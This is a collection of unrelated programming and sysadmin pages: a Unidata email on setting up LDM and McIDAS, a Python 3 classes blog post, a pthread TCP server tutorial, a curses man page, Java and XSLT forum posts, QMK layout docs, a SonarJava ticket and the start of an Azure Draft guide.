o XCD decoders are processing the data and writing the output into /var/data/ldm/xcd
o and McIDAS is setup to view the data being ingested by ADDE

Here is a list of things that I did:

LDM

1) logon as the user 'ldm'

2) stop the LDM:

   ldmadmin stop

3) edit the Bourne shell scripts batch.k, mcscour.sh, and xcd_run:

   cd decoders

   o make sure that all three scripts declare SHELL to be 'sh' and export that definition
   o make sure that all three scripts correctly set MCDATA, MCPATH, MCGUI, etc
   o modify PATH and LD_LIBRARY_PATH environment variables to remove SunOS specific settings

4) modify ldmd.conf to remove startup of pqexpire (not needed in LDM 5.1.x)

5) modify pqact.conf to remove unneeded decode actions and add 3 new actions that will be used if/when you start ingesting the FNEXRAD feed. In LDM 5.1.2, FNEXRAD was not yet understood, so the feed type I used in pqact.conf was NMC3. This will remain OK when you upgrade your LDM, but at some point you will want to change the NMC3 use to FNEXRAD as it is more clear as to what feed is being acted on.

McIDAS

1) logon as the user 'mcidas'

2) verify that the environment variable definitions in ~mcidas/.cshrc are correct. The McIDAS definitions were OK, but the setting of the PATH was not:

   change:

   set path = ( /sbin /usr/sbin /usr/bin /usr/bin/X11 . )

   to:

   if ( ! ${?path} ) then
     set path = ( /sbin /usr/sbin /usr/bin /usr/bin/X11 . )
   endif

   I believe that this was a BIG cause of the problems you originally reported. What happens is that when a McIDAS session is started, a routine called 'mcenv' is actually run.
If the user runs under the C shell, .cshrc is sourced. Given the 'path' setting that was in your .cshrc file, and given the construct in the McIDAS environment variable setting that guards against 'path' getting continually reset, you would lose the /home/mcidas/bin directory in 'path', and then subsequent attempts to do McIDAS things (list, plot, etc.) would fail since the executables would not be found.

3) remove the copies of LWPATH.NAM, STRTABLE, and SKEDFILE in /home/mcidas

4) remove the copies of ALLOC.WWW, RESOLV.SRV, and STRTABLE in /home/mcidas/mcidas7.8/data (created during test phase, but not needed anymore)

5) setup LOCAL.NAM, LSSERVE.BAT, and LOCDATA.BAT:

   cd ~mcidas/data

   edit LOCAL.NAM:
     change all occurrences of /var/data/xcd to /var/data/ldm/xcd (numerous)

   edit LSSERVE.BAT:
     comment out all definitions for datasets that you will most likely never host on your machine (e.g., WNEXRAD, WNOWRAD). Commenting out the definitions is done by adding a 'REM ' to each line that defines a group/descriptor pair

   edit LOCDATA.BAT:
     change DATALOCs to point at external machines for all of those datasets that you will likely never have locally (e.g., GINICOMP, GINIEAST, GINIWEST, NEXRCOMP (you may eventually host NEXRCOMP))

   NOTE: I added a new dataset to your LOCDATA.BAT file. The dataset is for composite NEXRAD reflectivity products. This dataset will be announced either this week or the next, but I wanted to give you a jump on it.
6) make the REDIRECTions specified in LOCAL.NAM active:

   cd ~mcidas/workdata    <- NB: I CD to the directory first
   rm LWPATH.NAM
   redirect.k REST LOCAL.NAM

7) remove previous ADDE dataset definitions and define those setup in LSSERVE.BAT:

   cd ~mcidas/workdata
   rm RESOLV.SRV
   batch.k LSSERVE.BAT

8) remove previous DATALOC definitions and then define them as specified in LOCDATA.BAT:

   cd ~/mcidas/data
   rm ADDESITE.TXT
   cd ~mcidas/workdata    <- NB: I CD to the directory first
   batch.k LOCDATA.BAT

9) make sure that the McIDAS environment string XCDDATA is defined in the McIDAS string table:

   cd ~mcidas/workdata    <- NB: I CD to the directory first
   te.k XCDDATA \"/var/data/ldm/xcd

10) run the scripts that setup XCD decoding:

   batch.k XCD.BAT
   batch.k XCDDEC.BAT

11) I will be releasing a new addendum for McIDAS soon. I uploaded some of the routines that are in the new addendum to your system so you could begin looking at the NEXRAD composite imagery now.

Back to LDM

6) I noticed that you had copied SATANNOT and SATBAND from either the McIDAS distribution or from the ldm-mcidas distribution to the /var/data/ldm/xcd directory. This is not needed, so I moved them to the /home/ldm/etc directory. These files are used by the ldm-mcidas pnga2area decoder. Their existence in ~ldm/etc is not needed for sites that are setup so that the HOME directory for 'mcidas' is /home/mcidas (like yours is). On other systems, I advise users to put the files in ~ldm/etc, and they would have to tell pnga2area where to find the files through '-a' and '-b' flags on the pqact.conf pnga2area invocation line.

7) verify that the mods I made to pqact.conf do not have errors and then restart the LDM:

   ldmadmin pqactcheck

   -- if no errors are found --

   ldmadmin start

OK, so that got things rolling!
I made, however, a couple more changes on your system:

McIDAS

1) edit the McIDAS ADDE remote server environment file to setup logging of ADDE transactions:

   cd ~mcidas
   edit .mcenv
   add ADDE_LOGGING=YES and export that setting

2) add a REDIRECTION for the ADDE remote server log file so that it will be read/written in the ~ldm/logs directory:

   cd ~mcidas/workdata
   redirect.k ADD SERVER.LO\* \"/var/data/ldm/logs
   touch /var/data/ldm/logs/SERVER.LOG
   chmod 666 /var/data/ldm/logs/SERVER.LOG

LDM

1) setup rotation of the ADDE remote server logs in cron:

   setenv EDITOR vi
   crontab -e

   <add>
   #
   # Rotate ADDE access log files just past 12 midnight on first day of month
   #
   1 0 1 * * /home/ldm/bin/newlog logs/SERVER.LOG 3; chmod 666 logs/SERVER.LOG

After setting up ADDE server logging, you can easily see who is looking at data through your remote server:

   <login as 'mcidas'>
   cd workdata
   addeinfo.k

The default execution of addeinfo.k just lists machines that have used your remote server, and how much data they transferred. addeinfo.k has other modes that allow you to see exactly what the external process was getting. Check out the online help for ADDEINFO for more information.

Wrap-up:

The changes I made were basically:

1) setup the McIDAS environment stuff in ~mcidas/.cshrc (and correct anything that was wrong there)
2) setup LOCAL.NAM, LSSERVE.BAT, and LOCDATA.BAT in ~mcidas/data
3) remove existing ADDE dataset definitions, file REDIRECTIONs, and DATALOCs so that the new setup in the files in 2) would be all that there is
4) define needed REDIRECTions, ADDE dataset definitions, and DATALOCs
5) setup ADDE server logging in McIDAS
6) tidy up the Bourne shell scripts in ~ldm/decoders
7) tidy up the entries in ~ldm/etc/ldmd.conf and ~ldm/etc/pqact.conf
8) stop and restart the LDM (at the appropriate times)
9) update your McIDAS distribution with some new source code and ancillary data files. This step was not needed to get you going at all.
I did it so you could look at the NEXRCOMP NEXRAD composite images.

Almost all of the steps above are what is presented in the online McIDAS documentation, or, at least, it is what I am trying to present. I think that your setup went "south" for two simple reasons:

o an errant 'path' definition in ~mcidas/.cshrc
o an editing mistake in ~mcidas/data/LOCAL.NAM (/data/ldm/xcd instead of /var/data/ldm/xcd)

Please let me know if you have any problems. In particular, please let me know what happens when you try to start the McIDAS MCGUI interface:

   <login as 'mcidas'>
   <set your DISPLAY environment variable>
   mcidas

If you are setting up any user accounts, you may well have to take a hard look at their ~/.cshrc file if it sets 'path' like what was done in the 'mcidas' .cshrc file.

I want to get this off to you so you can take a look...

Tom

Date: Sun, 17 Mar 2002 16:40:28 MST
To: Tom Yoksas <address@hidden>
From: "Dan A. Dansereau" <address@hidden>
Subject: RE: 20020317: McIDAS-X/XCD installation and configuration on DEC OSF/1 5.1

Tom,

Thanks much - I took a quick glance at your notes - the only major error was that I had changed the drive /var/data... paths just before I turned it over to you - and had not updated the NAM file - sorry. I will go thru everything - and give a wrap up later today/or in the AM again - thanks much - you do GOOD WORK!!!!!

Dan.
https://www.unidata.ucar.edu/support/help/MailArchives/mcidas/msg01821.html
Software Engineer/Blogger

If you have not read the first blog on the why, how, and hope of this series, check out the first here.

I think the biggest reason why I have chosen Python 3 over Python 2 is that starting this year, there will be no maintaining of Python 2 and almost no more bug fixes (see more here on Python's official documentation). Thus, I've decided to go ahead and code in Python 3 for the remainder of this series. Now, with that comes an interesting question: what's changed between versions? From what I've seen on the internet and in many blog posts, a few things come to mind:

    # Python 2 version of print
    >>> print "Hello World"
    Hello World

    # Python 3 version of print - print is now a function
    >>> print("Hello World")
    Hello World

print statements in Python 3

    # Python 2 - range([start - optional], stop, [step - optional]) vs. xrange([start - optional], stop, [step - optional])

    # range gives you a python list of values that you can iterate through immediately
    >>> a = range(1,100)
    >>> print "%s" % a
    [1, 2, 3, ..., 99]

    # xrange gives you back an object that evaluates lazily 👉🏾 (as you need it/on-demand) - good for memory
    >>> b = xrange(1,100)
    >>> print(b)
    xrange(1, 100)
    >>> for i in b:
    ...     print "%d" % i
    1
    2
    ...
    99

    # Python 3 - there is no more xrange! Just 1 range to rule them all (range in Python 3 includes xrange)
    >>> c = range(1,100)
    >>> print(c)
    range(1, 100)

    # if you want to make a list out of the range object
    >>> new_c = list(c)
    >>> print(new_c)
    [1, 2, 3, ..., 99]

range vs xrange in Python -> see more explanation at this Stack Overflow post 👉🏾

    # Python 2 - watch out for values that evaluate to float data types!
    >>> num1 = 1/2
    >>> print num1
    0

    # Python 3 - you'll get a float value
    >>> num2 = 1/2
    >>> print(num2)
    0.5

float handling in Python 3

While this is not at all an exhaustive list, I hope this gives an idea of some things that have changed from Python 2 to Python 3.
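One related detail worth knowing, which the list above doesn't mention: Python 3 kept Python 2's integer-division behavior behind a dedicated operator, //, so you can still get floored results when you want them:

```python
# "/" is always true division in Python 3; "//" is floor division
assert 1 / 2 == 0.5
assert 1 // 2 == 0    # the old Python 2 result of 1/2
assert 7 // 2 == 3
assert -7 // 2 == -4  # floors toward negative infinity, not toward zero
print("all division checks passed")
```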
Ultimately, if you are working on a legacy system of some sort, you might have to switch to Python 2, so the best case scenario is to be comfortable with both versions 😃.

Seeing as the blog posts will focus on the understanding and implementation of data structures and algorithms, I think it's important to explain a fundamental part of any object-oriented programming language, and that's classes. Rather than give you a definition first, it may be easier to think about a picture. Let's think about your standard calculator.

Photo by StellrWeb on Unsplash

A calculator has many different functions that a person has access to. A person can come to the calculator with their given numbers and add, subtract, multiply, divide and (depending on if it's a fancy calculator) also plot graphs, utilize charts, and much more. A class in Python is no different than a calculator. You can think of a class as an interface with defined functionality and attributes (the calculator's job is not to tell you the weather 👉🏾 it's to crunch numbers) to be accessed through an object (your finger would be the object, in this case, accessing the functionality of the calculator, providing the input in numbers and operations, and the calculator gives you the desired output). This can take you down a rabbit hole of examples when you think it through (a car can be considered a class, the remote you use for your tv can be considered a class, the possibilities and internet are endless with examples 😂). We'll choose to stay above ground and see what this simple example looks like in code 😃

    class Calculator:
        def __init__(self, num1, num2):
            self.num1 = num1
            self.num2 = num2

Consider this like the laying of groundwork for the Class

The def __init__ is considered to initialize the class¹. Most, if not all, classes have this at the top of the class file. You might be wondering about the self in the argument list.
This took me a while to figure out when first learning object-oriented programming, but in a nutshell, the self is "used to refer to the object being created at the moment" of initialization¹. num1 and num2 are both considered attributes, and they represent how you can extend your class (you don't have to use the same two numbers every single time you use your calculator).

    def add(self, n1, n2):
        return (n1 + n2)

    def subtract(self, n1, n2):
        return (n1 - n2)

    def multiply(self, n1, n2):
        return (n1 * n2)

    # remember in Python3 from above, you'll get out floats if you pass two integers
    def divide(self, n1, n2):
        return (n1/n2)

Rest of the functionality of the Calculator class

The add, subtract, multiply, and divide functions above would be considered the actual "buttons" that a user of the calculator would physically press for the desired usage. These functions work in the exact same way! Once you create your object, you can then access the class functions via the object, as you can see below 👇🏾

    class Calculator:
        def __init__(self, num1, num2):
            self.num1 = num1
            self.num2 = num2

        def add(self):
            return (self.num1 + self.num2)

        def subtract(self):
            return (self.num1 - self.num2)

        def multiply(self):
            return (self.num1 * self.num2)

        def divide(self):
            return (self.num1/self.num2)

Final Calculator.py file you would save

    # assuming you have saved the above code to a .py file in the same directory of launching python interpreter or ipython
    >>> cal_object1 = Calculator(4,5)
    # cal_object1 is now the object that you will use to access the functions/methods in the Calculator class
    >>> cal_object1.add()
    9
    >>> cal_object1.multiply()
    20
    >>> cal_object1.subtract()
    -1
    >>> cal_object1.divide()
    0.8
    >>> cal_object1.num1
    4
    >>> cal_object1.num2
    5

    # The flexible part about creating a class is assigning different attributes (or in our case numbers)
    # all you have to do is create a new object!
    >>> cal_object2 = Calculator(10,20)
    >>> cal_object2.add()
    30

Object creation using Calculator.py

If this example makes sense and you are solid on the information, you did it! Pat yourself on the back 😃. Being comfortable with classes moving through the series is very important, as the data structures and algorithms that we will be invoking are not native to Python (or really any other language), therefore they will need to be built before implemented. Seeing as the only way to get better is through practice, I will be posting some programming problems sometime next week via online flashcards that I will share publicly so you can practice your programming anywhere. Until next time! 👋🏾

If your interest was piqued and/or you have been encouraged/helped by this blog post, follow me on Twitter (@jeff_ridgeway4)!

References:

[1] Shovic, John C, and Alan Simpson. "Doing Python with Class." Python All-In-One For Dummies, John Wiley & Sons, Inc., 2019, pp. 213–220.

Photo by Hitesh Choudhary on Unsplash

Previously published at
https://hackernoon.com/re-learning-data-structures-and-algorithms-series-python-3-and-classes-jz2h377i
pthread API

I've described several ways to write a TCP server:

- socket system calls, serving one client at a time
- the fork system call to serve multiple clients (one client per process)
- the select system call to serve multiple clients
- kqueue system calls to serve multiple clients

Today I'll describe another: using the pthread library to serve multiple clients. The pthread functions are not system calls, but they are part of the standard POSIX API. (In future, I'll describe how pthreads are implemented on top of system calls.)

The library in pthread.h includes many functions, but today we'll just use the most fundamental one:

    #include <pthread.h>

    int pthread_create(pthread_t *thread, const pthread_attr_t *attr,
                       void *(*start_routine)(void *), void *arg);

The pthread_create function is somewhat like the fork system call: it creates two threads of control where previously there was one. The important differences today are:

- The fork system call starts the new process at the same program counter as the old process. But the pthread_create function takes a function pointer, and starts the new thread at that position.
- The fork system call clones the file descriptor table for the new process. The pthread_create function does not; instead, the thread shares the same file descriptor table.
Here's the program, which runs an "echo" server for every TCP client, using pthread_create for each new TCP connection:

    #include <stdlib.h>
    #include <stdio.h>
    #include <stdint.h>
    #include <unistd.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <pthread.h>

    int guard(int r, char *err) {
      if (r == -1) { perror(err); exit(1); }
      return r;
    }

    void *thread_func(void *arg) {
      intptr_t conn_fd = (intptr_t) arg;
      printf("thread: serving fd %ld\n", (long) conn_fd);
      char buf[1024];
      for (;;) {
        int bytes_received = guard(recv(conn_fd, buf, sizeof(buf), 0), "Could not recv");
        if (bytes_received == 0) {
          goto stop_serving;
        }
        int bytes_sent = 0;
        while (bytes_sent < bytes_received) {
          ssize_t bytes_sent_this_call = send(conn_fd, buf + bytes_sent, bytes_received - bytes_sent, 0);
          if (bytes_sent_this_call == -1) {
            goto stop_serving;
          }
          bytes_sent += bytes_sent_this_call;
        }
      }
    stop_serving:
      guard(close(conn_fd), "Could not close socket");
      printf("thread: finished serving %ld\n", (long) conn_fd);
      return NULL;
    }

    int main(void) {
      int listen_fd = guard(socket(AF_INET, SOCK_STREAM, 0), "Could not create TCP listening socket");
      guard(listen(listen_fd, 100), "Could not listen");
      struct sockaddr_in addr;
      socklen_t addr_bytes = sizeof(addr);
      guard(getsockname(listen_fd, (struct sockaddr *) &addr, &addr_bytes), "Could not get sock name");
      printf("Listening on port %d\n", ntohs(addr.sin_port));
      for (;;) {
        intptr_t conn_fd = guard(accept(listen_fd, NULL, NULL), "Could not accept");
        pthread_t thread_id;
        int ret = pthread_create(&thread_id, NULL, thread_func, (void *) conn_fd);
        if (ret != 0) {
          printf("Error from pthread: %d\n", ret);
          exit(1);
        }
        printf("main: created thread to handle connection %ld\n", (long) conn_fd);
      }
      return 0;
    }

I wrote this because I felt like it. This post is my own, and not associated with my employer.
https://jameshfisher.github.io/2017/02/28/tcp-server-pthreads.html
getnstr, getstr, mvgetnstr, mvgetstr, mvwgetnstr, mvwgetstr, wgetstr, wgetnstr - get a multi-byte character string from the terminal

#include <curses.h>

int getnstr(char *str, int n);
int getstr(char *str);
int mvgetnstr(int y, int x, char *str, int n);
int mvgetstr(int y, int x, char *str);
int mvwgetnstr(WINDOW *win, int y, int x, char *str, int n);
int mvwgetstr(WINDOW *win, int y, int x, char *str);
int wgetnstr(WINDOW *win, char *str, int n);
int wgetstr(WINDOW *win, char *str);

The effect of getstr() is as though a series of calls to getch() were made, until a newline, carriage return or end-of-file is received. The resulting value is placed in the area pointed to by str. The string is then terminated with a null byte. The getnstr(), mvgetnstr(), mvwgetnstr() and wgetnstr() functions read at most n bytes, thus preventing a possible overflow of the input buffer. The user's erase and kill characters are interpreted, as well as any special keys (such as function keys, home key, clear key, and so on).

The mvgetstr() function is identical to getstr() except that it is as though it is a call to move() and then a series of calls to getch(). The mvwgetstr() function is identical to getstr() except it is as though a call to wmove() is made and then a series of calls to wgetch(). The mvgetnstr() function is identical to getnstr() except that it is as though it is a call to move() and then a series of calls to getch(). The mvwgetnstr() function is identical to getnstr() except it is as though a call to wmove() is made and then a series of calls to wgetch().

The getnstr(), wgetnstr(), mvgetnstr() and mvwgetnstr() functions will only return the entire multi-byte sequence associated with a character. If the array is large enough to contain at least one character, the functions fill the array with complete characters. If the array is not large enough to contain any complete characters, the function fails.

Upon successful completion, these functions return OK. 
Otherwise, they return ERR. No errors are defined. Reading a line that overflows the array pointed to by str with getstr(), mvgetstr(), mvwgetstr() or wgetstr() causes undefined results. The use of getnstr(), mvgetnstr(), mvwgetnstr() or wgetnstr(), respectively, is recommended. Input Processing, beep(), getch(), <curses.h>.
http://pubs.opengroup.org/onlinepubs/007908799/xcurses/mvgetstr.html
g tsuji wrote:

First, a preliminary note to clear up a possible misinterpretation: collection() is an XSLT 2.0 XPath function. Now collection() can be considered a high-octane version of doc() or document(). With its high performance come its restrictions: it cannot be used to collect a sequence of non-XML urls, as it expects to parse what it collects, and any ill-formedness will result in a fatal error. In order to collect an enumerated list of non-XML text files (like .ini files containing name/value pairs, or even csv, or else...) you have to fall back to using doc() or document().

To make the closest analog to the use of a catalog (xml) with collection() in some implementations, you can construct an apparently similar catalog xml document and load it with doc() or document(), and then feed each href to some user-defined xsl function (or named template) designed for the specific purpose of parsing it.

For instance, let us make a catalog, say catalog.xml, of the form like this:

<collection>
  <doc href="abc.ini" />
  <doc href="def.ini" />
  <doc href="xyz.ini" />
</collection>

You could process the enumerated list of external files like this. (The <doc>...</doc> wrapper is just for illustration, of no generic necessity; and fn is some arbitrary namespace for the user-defined xslt function main().)

<!-- namespace prefix fn defined in the root xsl:stylesheet -->
<xsl:for-each select="doc('catalog.xml')/collection/doc">
  <doc>
    <xsl:sequence select="fn:main(@href)"/>
  </doc>
</xsl:for-each>

With the function fn:main() looking possibly like this. (I make maximum continuity with the op's previous thread for maximum clarity.)

<xsl:function name="fn:main">
  <xsl:param name="href"/>
  <xsl:variable name="text" select="unparsed-text($href)"/>
  <config>
    <!-- etc etc... -->
  </config>
</xsl:function>

Then the collection will be loaded and parsed into the particular form desired for the authoring of the resultant xml.
http://www.coderanch.com/t/537575/XML/list-xml-files
Hi, I found this simple code. I am new to threads and I want to know how this code can be modified so that 5 balls can be created and bounced off the boundaries. Will that require multiple threads - one for each ball? Do help me with this. I have been on this since yesterday!

Code:

import java.applet.Applet;
import java.awt.Color;
import java.awt.Graphics;
import java.awt.Rectangle;

/** An applet that displays a simple animation */
public class BouncingCircle extends Applet implements Runnable {
    int x = 150, y = 50, r = 50;   // Position and radius of the circle
    int dx = 11, dy = 7;           // Trajectory of circle
    Thread animator;               // The thread that performs the animation
    volatile boolean pleaseStop;   // A flag to ask the thread to stop

    /** This method simply draws the circle at its current position */
    public void paint(Graphics g) {
        g.setColor(Color.red);
        g.fillOval(x - r, y - r, r * 2, r * 2);
    }

    /**
     * This method moves (and bounces) the circle and then requests a redraw.
     * The animator thread calls this method periodically.
     */
    public void animate() {
        // Bounce if we've hit an edge.
        Rectangle bounds = getBounds();
        if ((x - r + dx < 0) || (x + r + dx > bounds.width)) dx = -dx;
        if ((y - r + dy < 0) || (y + r + dy > bounds.height)) dy = -dy;
        // Move the circle.
        x += dx;
        y += dy;
        // Ask the browser to call our paint() method to draw the circle
        // at its new position.
        repaint();
    }

    /**
     * This method is from the Runnable interface. It is the body of the thread
     * that performs the animation. The thread itself is created and started in
     * the start() method.
     */
    public void run() {
        while (!pleaseStop) {                 // Loop until we're asked to stop
            animate();                        // Update and request redraw
            try { Thread.sleep(100); }        // Wait 100 milliseconds
            catch (InterruptedException e) {} // Ignore interruptions
        }
    }

    /** Start animating when the browser starts the applet */
    public void start() {
        animator = new Thread(this); // Create a thread
        pleaseStop = false;          // Don't ask it to stop now
        animator.start();            // Start the thread.
        // The thread that called start now returns to its caller.
        // Meanwhile, the new animator thread has called the run() method
    }

    /** Stop animating when the browser stops the applet */
    public void stop() {
        // Set the flag that causes the run() method to end
        pleaseStop = true;
    }
}

Thanks!
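One common approach (my sketch, not from the thread; the class and method names are invented): you do not need one thread per ball. Give each ball its own object holding position and trajectory, and let a single animator thread move every ball in a list on each tick.

```java
import java.util.ArrayList;
import java.util.List;

public class BouncingBalls {
    static class Ball {
        int x, y, r, dx, dy;

        Ball(int x, int y, int r, int dx, int dy) {
            this.x = x; this.y = y; this.r = r; this.dx = dx; this.dy = dy;
        }

        // Same bounce logic as BouncingCircle.animate(), applied per ball.
        void move(int width, int height) {
            if (x - r + dx < 0 || x + r + dx > width) dx = -dx;
            if (y - r + dy < 0 || y + r + dy > height) dy = -dy;
            x += dx;
            y += dy;
        }
    }

    public static void main(String[] args) {
        List<Ball> balls = new ArrayList<>();
        for (int i = 0; i < 5; i++) {
            balls.add(new Ball(60 + 40 * i, 50 + 10 * i, 20, 3 + i, 2 + i));
        }
        // One "tick" of the animation loop: move every ball, then repaint once.
        for (Ball b : balls) {
            b.move(400, 300);
        }
        System.out.println("moved " + balls.size() + " balls"); // prints: moved 5 balls
    }
}
```

In paint() you would then loop over the list and call fillOval for each ball, and animate() would call move on every ball before a single repaint(); one animator thread is enough, though one thread per ball would also work.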
http://www.javaprogrammingforums.com/%20threads/9207-bouncing-balls-printingthethread.html
In Java, char is the data type used to store characters. However, C/C++ programmers beware: char in Java is not the same as char in C/C++. In C/C++, char is 8 bits wide. This is not the case in Java. Instead, Java uses Unicode to represent characters. Unicode defines a fully international character set that can represent all of the characters found in all human languages. It is a unification of dozens of character sets, such as Latin, Arabic, Greek, Hebrew, Cyrillic, and many more. At the time of Java's creation, Unicode required 16 bits. Thus, in Java char is a 16-bit type. The range of a char is from 0 to 65,535. There are no negative chars. The standard set of characters known as ASCII still ranges from 0 to 127 as always, and the extended 8-bit character set, ISO-Latin-1, ranges from 0 to 255. Since Java is designed to allow programs to be written for worldwide use, it makes sense that it would use Unicode to represent characters. Of course, the use of Unicode is slightly inefficient for languages such as English, Spanish, German, or French, whose characters can easily be contained within 8 bits. But such is the price that must be paid for global portability.

Below is a program that demonstrates char variables:

/* Java Program Example - Java Characters
 * This program demonstrates the char data type
 */
public class JavaProgram {
    public static void main(String args[]) {
        char ch1, ch2;
        ch1 = 88;   // code for X
        ch2 = 'Y';
        System.out.print("ch1 : " + ch1 + "\nch2 : " + ch2);
    }
}

When the above Java program is compiled and run, it will produce the following output:

ch1 : X
ch2 : Y

Notice here that variable ch1 is assigned the value 88, which is the ASCII (and Unicode) value that corresponds to the letter X. As discussed, the ASCII character set occupies the first 127 values in the Unicode character set. For this reason, all the older tricks that you may have used with characters in other languages will work in Java, also. 
Even though char is designed to hold Unicode characters, it can also be used as an integer type on which you can perform arithmetic operations. For instance, you can add two characters together, or increment the value of a character variable. Consider the example program below:

/* Java Program Example - Java Characters
 * char variables behave like integers
 */
public class JavaProgram {
    public static void main(String args[]) {
        char ch1;
        ch1 = 'X';
        System.out.println("ch1 contains " + ch1);
        ch1++;  // increments ch1
        System.out.println("ch1 is now " + ch1);
    }
}

When the above Java program is compiled and run, it will produce the following output:

ch1 contains X
ch1 is now Y

In the above program, ch1 is first given the value X. Next, ch1 is incremented. This results in ch1 holding Y, the next character in the ASCII (and Unicode) sequence.

A character preceded by the backslash (\) is an escape sequence and has special meaning to the compiler. As you have seen, the newline character (\n) has been used frequently in System.out.println() statements to advance to the next line after the string is printed. The table below shows Java's escape sequences:

\ddd      Octal character (ddd)
\uxxxx    Hexadecimal Unicode character (xxxx)
\'        Single quote
\"        Double quote
\\        Backslash
\r        Carriage return
\n        New line (line feed)
\f        Form feed
\t        Tab
\b        Backspace

When an escape sequence is encountered in a print statement, the compiler interprets it accordingly. For example, if you want to put quotes within quotes, then you must use the escape sequence, \", on the interior quotes:

/* Java Program Example - Java Characters */
class JavaProgram {
    public static void main(String args[]) {
        System.out.println("He said \"Hello!\" to me.");
    }
}

It will produce the following result:

He said "Hello!" to me.

Here are some more examples related to characters that you can try.
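One related detail worth noting (my example, not from the text above): an expression like ch + 1 has type int, so storing it back into a char needs an explicit cast; the ++ operator shown above performs that narrowing implicitly.

```java
public class CharMath {
    public static void main(String[] args) {
        char ch = 'X';
        int code = ch + 1;           // char promotes to int: 88 + 1 = 89
        char next = (char) (ch + 1); // explicit cast needed to store it in a char
        System.out.println(code);    // prints 89
        System.out.println(next);    // prints Y
    }
}
```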
https://codescracker.com/java/java-characters.htm
The layouts/ folder contains different physical key layouts that can apply to different keyboards.

layouts/
+ default/
|  + 60_ansi/
|  |  + readme.md
|  |  + layout.json
|  |  + a_good_keymap/
|  |  |  + keymap.c
|  |  |  + readme.md
|  |  |  + config.h
|  |  |  + rules.mk
|  |  + <keymap folder>/
|  |  + ...
|  + <layout folder>/
+ community/
|  + <layout folder>/
|  + ...

The layouts/default/ and layouts/community/ are two examples of layout "repositories" - currently default will contain all of the information concerning the layout, and one default keymap named default_<layout>, for users to use as a reference. community contains all of the community keymaps, with the eventual goal of being split off into a separate repo for users to clone into layouts/. QMK searches through all folders in layouts/, so it's possible to have multiple repositories here.

Each layout folder is named ([a-z0-9_]) after the physical aspects of the layout, in the most generic way possible, and contains a readme.md with the layout to be defined by the keyboard:

# 60_ansi

LAYOUT_60_ansi

New names should try to stick to the standards set by existing layouts, and can be discussed in the PR/Issue.

For a keyboard to support a layout, the variable must be defined in its <keyboard>.h, and match the number of arguments/keys (and preferably the physical layout):

#define LAYOUT_60_ansi KEYMAP_ANSI

The name of the layout must match this regex: [a-z0-9_]+

The folder name must be added to the keyboard's rules.mk:

LAYOUTS = 60_ansi

LAYOUTS can be set in any keyboard folder level's rules.mk:

LAYOUTS = 60_iso

but the LAYOUT_<layout> variable must be defined in <folder>.h as well.

You should be able to build the keyboard keymap with a command in this format:

make <keyboard>:<layout>

When a keyboard supports multiple layout options,

LAYOUTS = ortho_4x4 ortho_4x12

and a layout exists for both options,

layouts/
+ community/
|  + ortho_4x4/
|  |  + <layout>/
|  |  |  + ...
|  + ortho_4x12/
|  |  + <layout>/
|  |  |  + ...
|  + ...

the FORCE_LAYOUT argument can be used to specify which layout to build:

make <keyboard>:<layout> FORCE_LAYOUT=ortho_4x4
make <keyboard>:<layout> FORCE_LAYOUT=ortho_4x12

Instead of using #include "planck.h", you can use this line to include whatever <keyboard>.h file is being compiled (<folder>.h should not be included here):

#include QMK_KEYBOARD_H

If you want to keep some keyboard-specific code, you can use these variables to escape it with an #ifdef statement:

KEYBOARD_<folder1>_<folder2>

For example:

#ifdef KEYBOARD_planck
    #ifdef KEYBOARD_planck_rev4
        planck_rev4_function();
    #endif
#endif

Note that the names are lowercase and match the folder/file names for the keyboard/revision exactly.

In order to support both split and non-split keyboards with the same layout, you need to use the keyboard-agnostic LAYOUT_<layout name> macro in your keymap. For instance, in order for a Let's Split and a Planck to share the same layout file, you need to use LAYOUT_ortho_4x12 instead of LAYOUT_planck_grid or just {} for a C array.
https://beta.docs.qmk.fm/developing-qmk/qmk-reference/feature_layouts
Details

Description: Implements and replaces

Activity:

@Dinesh, I'm reopening this ticket to also log an issue when using classes located in 'sun.*' packages. Could you also replace double quotes with single quotes in the rule title? Thanks

Done! Manually tested!

Why do you exclude classes located in 'com.sun.*'? We are using Jersey and the new rule detects all classes as issues but they are not... (com.sun.jersey.api.client.WebResource)

Here is the full description (J. Bernard):

Classes in com.sun.* and sun.* packages are considered implementation details, and are not part of the Java API. They can cause problems when moving to new versions of Java because there is no backwards compatibility guarantee. Such classes are almost always wrapped by Java API classes that should be used instead. The following code snippet illustrates this rule:

import com.sun.jna.Native; // Non-Compliant

If this rule doesn't make sense in your context, you just have to deactivate it. Done
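As the rule description says, such internal classes are almost always wrapped by public Java API classes. A hedged illustration of a compliant replacement (the class name here is mine; java.util.Base64 exists since Java 8): instead of the internal sun.misc.BASE64Encoder, use the public API.

```java
import java.util.Base64;

public class EncodeExample {
    // Compliant: the public java.util.Base64 API replaces the internal
    // sun.misc.BASE64Encoder class, which this rule would flag.
    static String encode(String s) {
        return Base64.getEncoder().encodeToString(s.getBytes());
    }

    public static void main(String[] args) {
        System.out.println(encode("hello")); // prints aGVsbG8=
    }
}
```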
http://jira.codehaus.org/browse/SONARJAVA-281
Use Draft with Azure Kubernetes Service (AKS)

Draft is an open-source tool that helps package and deploy application containers in a Kubernetes cluster, leaving you free to concentrate on the dev cycle - the "inner loop" of concentrated development. Draft works as the code is being developed, but before committing to version control. With Draft, you can quickly redeploy an application to Kubernetes as code changes occur. For more information on Draft, see the Draft documentation on Github.

This article shows you how to use Draft with a Kubernetes cluster on AKS.

Prerequisites

The steps detailed in this article assume that you have created an AKS cluster and have established a kubectl connection with the cluster. If you need these items, see the AKS quickstart.

You need a private Docker registry in Azure Container Registry (ACR). For steps on how to create an ACR instance, see the Azure Container Registry quickstart.

Helm must also be installed in your AKS cluster. For more information on how to install and configure Helm, see Use Helm with Azure Kubernetes Service (AKS). Finally, you must install Docker.

Install Draft

The Draft CLI is a client that runs on your development system and allows you to deploy code into a Kubernetes cluster. To install the Draft CLI on a Mac, use brew. For additional installation options, see the Draft Install guide.

Note: If you installed Draft prior to version 0.12, first delete Draft from your cluster using helm delete --purge draft and then remove your local configuration by running rm -rf ~/.draft. If you are on MacOS, then run brew upgrade draft.

brew tap azure/draft
brew install draft

Now initialize Draft with the draft init command:

draft init

Configure Draft

Draft builds the container images locally, and then either deploys them from the local registry (such as with Minikube), or uses an image registry that you specify. 
